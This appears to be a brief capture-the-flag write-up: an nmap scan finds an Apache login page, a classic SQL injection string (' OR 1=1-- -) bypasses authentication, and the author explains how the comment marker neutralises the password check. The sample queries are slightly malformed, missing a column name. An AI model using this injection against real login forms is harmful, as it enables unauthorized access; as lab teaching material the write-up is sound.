# Enumeration
## NMAP
```txt
PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.38 ((Debian))
|_http-favicon: Unknown favicon MD5: 7D4140C76BF7648531683BFA4F7F8C22
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Login

```

## Web
- We have a login page.
- We can try basic SQL injection
```txt
' OR 1=1-- -
```
- And we're logged in
`#### e3d0796d002a446c0e622226f42e9672`
- What I assume happened was.
```sql
select user FROM admin where ='test' and password = 'test'
```
- Now if we inject our code in.
```sql
SELECT user FROM admin WHERE ='' OR 1=1-- -' AND password = 'test'
```
- It will comment out the rest of the query. Since 1=1 is always true, the query will be true and we log in.
